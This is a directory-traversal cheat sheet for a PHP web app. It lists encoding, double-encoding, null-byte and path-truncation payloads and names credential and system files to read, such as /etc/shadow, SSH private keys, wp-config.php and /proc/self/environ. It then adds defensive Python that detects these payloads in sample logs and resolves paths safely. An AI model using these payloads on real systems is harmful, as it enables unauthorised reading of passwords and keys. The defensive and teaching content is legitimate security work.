# Identifying Directory Traversals

```bash
https://example.com/cms/login.php?language=en.html
```

- `login.php` tells us the web application uses **PHP**.
- The URL contains a *language* parameter with an HTML page as its value. We should try to navigate to the file directly (`https://example.com/cms/en.html`). If we can open it, we have confirmed that `en.html` is a file on the server, which means the parameter takes file names and we can try other ones.
- The URL contains a directory called `cms`. This is important information: it indicates that the web app is running in a subdirectory of the web root, so relative paths have to climb one level further than they would from the web root itself.

---

# Exploit Directory Traversals

```bash
../../../etc/passwd
/../../../etc/passwd
....//....//....//etc/passwd
/cgi-bin/../../../../../etc/passwd
/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

# Encoding
..%2F..%2F..%2Fetc%2Fpasswd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

# Double Encoding
..%252F..%252F..%252Fetc%252Fpasswd

# Null Bytes
/etc/passwd%00

# Approved Paths - find the approved path, then go back to the root directory and read the file
/index.php?language=./languages/../../../../etc/passwd

# Appended Extensions (e.g., .php) - does not work on modern PHP
# - If the path reaches the 4096-character limit, the appended extension is truncated
# - Start the path with a non-existing directory, then pad with "./" until the limit is reached
?language=non_existing_dir/../../../../../etc/passwd/././././. (REPEAT)
echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done
```

# Exploit

```bash
/etc/passwd
/etc/shadow
C:\Windows\System32\drivers\etc\hosts   # windows
C:\inetpub\wwwroot\web.config           # windows
/home/john/.ssh/id_rsa
/home/john/.ssh/authorized_keys
/home/john/.bash_history
/var/www/html/config.php
/var/www/html/wp-config.php
/var/www/html/index.php
/var/www/html/.git/config
/var/www/html/uploads
/proc/self/environ
/root/.bash_history
```
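To turn the variant list above into something a defender can run, here is an added Python example (not part of the original notes and not code from any real CMS). It percent-decodes a file-name parameter until the value stops changing, so double encoding is seen as plain `../`; flags the null-byte, over-length, absolute-path and dot-segment forms listed above (including `....//` and `%2e%2e/`, and Windows backslash paths); runs that check over a few constructed access-log lines; and shows the server-side fix: resolve the requested name under an approved directory with `os.path.realpath` and reject anything whose real path ends up outside it. The log lines, client addresses, the `/var/www/html/languages` base directory and the 1024-character length limit are constructed assumptions.

```python
"""Detect the traversal variants listed above and resolve file names safely.

Added example with constructed sample data; not code from any real application.
"""
import os
import re
from urllib.parse import unquote

MAX_VALUE_LENGTH = 1024  # assumption: no legitimate language file name is this long
DOTS_ONLY_SEGMENT = re.compile(r"(^|/)\.{2,}(/|$)")  # "..", "....", ... as a whole segment
ABSOLUTE_PATH = re.compile(r"^([A-Za-z]:)?/")        # "/etc/passwd" or "C:/Windows/..."


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable, so "..%252F" is seen as "../" (double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal_attempt(raw_value: str) -> bool:
    """True if a file-name parameter matches one of the traversal variants above."""
    decoded = decode_fully(raw_value)
    if "\x00" in decoded:                 # null-byte truncation trick
        return True
    if len(decoded) > MAX_VALUE_LENGTH:   # path-length (4096) truncation trick
        return True
    normalised = decoded.replace("\\", "/")  # treat Windows separators like "/"
    if ABSOLUTE_PATH.match(normalised):      # the parameter should name a relative file
        return True
    # "../", "....//" and decoded "%2e%2e/" all leave a dots-only segment
    return DOTS_ONLY_SEGMENT.search(normalised) is not None


def safe_resolve(base_dir: str, requested: str):
    """Return the real path of `requested` inside `base_dir`, or None if it escapes.

    Server-side fix: resolve first (realpath follows symlinks and collapses ".."),
    then require the result to still be under the approved directory.
    """
    base = os.path.realpath(base_dir)
    decoded = decode_fully(requested)
    if "\x00" in decoded:
        return None
    # os.path.join drops `base` when `decoded` is absolute, so "/etc/passwd"
    # still fails the containment check below.
    candidate = os.path.realpath(os.path.join(base, decoded))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Constructed access-log lines (Apache combined style) carrying payloads from the list above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /cms/login.php?language=en.html HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /cms/login.php?language=../../../etc/passwd HTTP/1.1" 200 1024',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /cms/login.php?language=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1024',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /cms/login.php?language=....//....//....//etc/passwd HTTP/1.1" 200 1024',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /cms/login.php?language=/etc/passwd%00 HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /cms/login.php?language=fr.html HTTP/1.1" 200 512',
]

LANGUAGE_PARAM = re.compile(r'[?&]language=([^&\s"]*)')  # raw (still encoded) parameter value


def flag_traversal_requests(log_lines):
    """Return (client, raw value) pairs whose language= parameter is a traversal attempt."""
    hits = []
    for line in log_lines:
        match = LANGUAGE_PARAM.search(line)
        if match and is_traversal_attempt(match.group(1)):
            hits.append((line.split()[0], match.group(1)))
    return hits


if __name__ == "__main__":
    for client, value in flag_traversal_requests(SAMPLE_LOG):
        print(f"{client} -> {value!r}")
    print(safe_resolve("/var/www/html/languages", "en.html"))
    print(safe_resolve("/var/www/html/languages", "./languages/../../../../etc/passwd"))
```

The detector is deliberately strict (any absolute path or dots-only segment is flagged) because a language parameter has no legitimate reason to carry either; the resolver is the check that actually has to be correct, since encoding tricks are irrelevant once the real path has been computed and compared against the approved directory.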